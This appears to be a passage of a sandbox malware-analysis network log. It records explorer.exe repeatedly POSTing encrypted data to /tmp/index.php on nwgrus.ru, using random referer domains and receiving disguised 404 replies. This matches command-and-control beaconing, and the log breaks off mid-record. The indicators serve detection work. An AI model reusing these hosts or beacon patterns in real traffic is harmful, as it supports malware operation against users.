                              Oct 12, 2024 20:08:19.650695086 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://vltcfypculmuiq.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 156
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:19.650719881 CEST156OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 62 5c c4 86
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vub\'w]g>eY5>0UTvHJ%$BZl([rL'F
                              Oct 12, 2024 20:08:21.135768890 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:20 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.550011119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:21.144534111 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://emfnibhwebsi.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 267
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:21.144654989 CEST267OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 61 0a eb e9
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuaK2QWWml$DFfC[hS:&\>#H{G\Z,.Of7`[e^l}'=D7g N@faTxfGF
                              Oct 12, 2024 20:08:22.612827063 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:22 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.550012119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:22.624696970 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://sawtavgcrgnnv.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 305
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:22.624831915 CEST305OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 56 40 e2 8f
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[*k,vuV@^ E|:spA~Du6w_R[@Y]>()_ #1i8M8g\l{wq4n^},ko,X]oCf(.*


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.550013119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:23.959450006 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ttpnojrymdictnko.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 261
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:23.959471941 CEST261OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 34 2f ee a4
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[+k,vu4/mSE_TRtgNB2zKQ:F9E]Kj_9}sD]D{YVbb^##JYhVwZHt6oefJm
                              Oct 12, 2024 20:08:25.476564884 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.550014119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:09:32.651304007 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://sdiwjkiticrn.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 319
                              Host: nwgrus.ru
                              Oct 12, 2024 20:09:32.651304007 CEST319OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 40 d9 9e
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu]@B:dSyyu][uX#w/K%n1YSEU9LDj-a6\7[l4DBU|j@k S U
                              Oct 12, 2024 20:09:34.491059065 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:33 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r
                              Oct 12, 2024 20:09:34.491380930 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:33 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.2.550015119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:09:38.300371885 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://uedxkfpodrvnuu.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 236
                              Host: nwgrus.ru
                              Oct 12, 2024 20:09:38.300395012 CEST236OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 4e b7 ad
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuyNtQoslY aO6Ff3K\[8SP +b;A3F$Xo.B3C[vqDs\O,b
                              Oct 12, 2024 20:09:39.836384058 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r
                              Oct 12, 2024 20:09:40.892951012 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r
                              Oct 12, 2024 20:09:40.893574953 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              38192.168.2.550016119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:09:43.706906080 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://jmiqpftbbfl.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 359
                              Host: nwgrus.ru
                              Oct 12, 2024 20:09:43.706906080 CEST359OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 53 a2 9b
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuCSM<j~TjwM)<lCo@{IS]1v"*n@XE.o<rD@s0b`zkR-]6(QcpR.plP?q
                              Oct 12, 2024 20:09:45.206844091 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:44 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              39192.168.2.550017119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:09:49.811738968 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://eguapsteeivf.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 368
                              Host: nwgrus.ru
                              Oct 12, 2024 20:09:49.811764956 CEST368OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 35 56 e5 aa
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu5VY/c+MYt5c^F^?>>#]$"+M0'NP[]9LG-x3vgMCkPBRx
                              Oct 12, 2024 20:09:51.303992987 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              40192.168.2.550018119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:09:55.730739117 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://jmyhnxbsgfyxxpwc.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 333
                              Host: nwgrus.ru
                              Oct 12, 2024 20:09:55.730772018 CEST333OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 63 23 bc 92
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuc#z'AQ|}>FP6"Qs;l]TWMd78LASxb7+&vVza#Ri<fBW{+b)Ii*Ii
                              Oct 12, 2024 20:09:57.202977896 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:09:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              41192.168.2.560089175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:05.624172926 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://olbmmmarqkp.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 123
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:05.624182940 CEST123OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5c 49 f3 f2
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vu\I(NrXV[M{l}-4
                              Oct 12, 2024 20:10:07.063302040 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:06 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              42192.168.2.560090175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:10.432107925 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://hhxlvwfcbrqijpck.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 194
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:10.432109118 CEST194OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 40 a5 99
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuA@bhZy=$u)B;`C~5`{l9L,B7\/Ar1<e(*_"TE
                              Oct 12, 2024 20:10:11.869925022 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:11 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              43192.168.2.560091175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:16.442836046 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://stpaxqpyogea.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 173
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:16.442836046 CEST173OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4b 15 a2 a1
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuKU!r{Ml"4lYv4GNWsF3D:6e9R(bB34C*Q/
                              Oct 12, 2024 20:10:17.906589985 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:17 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              44192.168.2.560092175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:22.254404068 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://hvlkumwrcebxfc.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 231
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:22.254436016 CEST231OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 34 a4 8a
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuX4H5wI<Ey648jqM{>S`VH;2NF{$('.i'-awA\De({`_*
                              Oct 12, 2024 20:10:23.702090025 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              45192.168.2.560093175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:28.957082033 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://wuwimcitsicpgplo.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 200
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:28.957132101 CEST200OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 27 a5 9b
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuH'q+xsr8n `mvCk,fG-^'lQBK1MVP(Pcp71$q]|A.D.
                              Oct 12, 2024 20:10:30.352883101 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:30 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              46192.168.2.560094175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:34.773941040 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://iqvctgowbce.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 239
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:34.773976088 CEST239OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 75 1c b9 88
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuuHlNiYgStXYd_u0Q:P(2Icy >P-{zJ0vP2~HZ+] 6ltHKjxN
                              Oct 12, 2024 20:10:36.229604006 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:10:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 03 00 00 00 72 e8 84
                              Data Ascii: r


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              47192.168.2.560095175.119.10.231801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:10:40.195491076 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ranxxolmdknfcjg.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 273
                              Host: nwgrus.ru
                              Oct 12, 2024 20:10:40.195527077 CEST273OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 53 14 c7 a1
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA .[k,vuS|`]a0/.oil&A2C2V2HyT*47C rD7CNCI_b ooM&~# w
                              Oct 12, 2024 20:10:41.630479097 CEST151INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
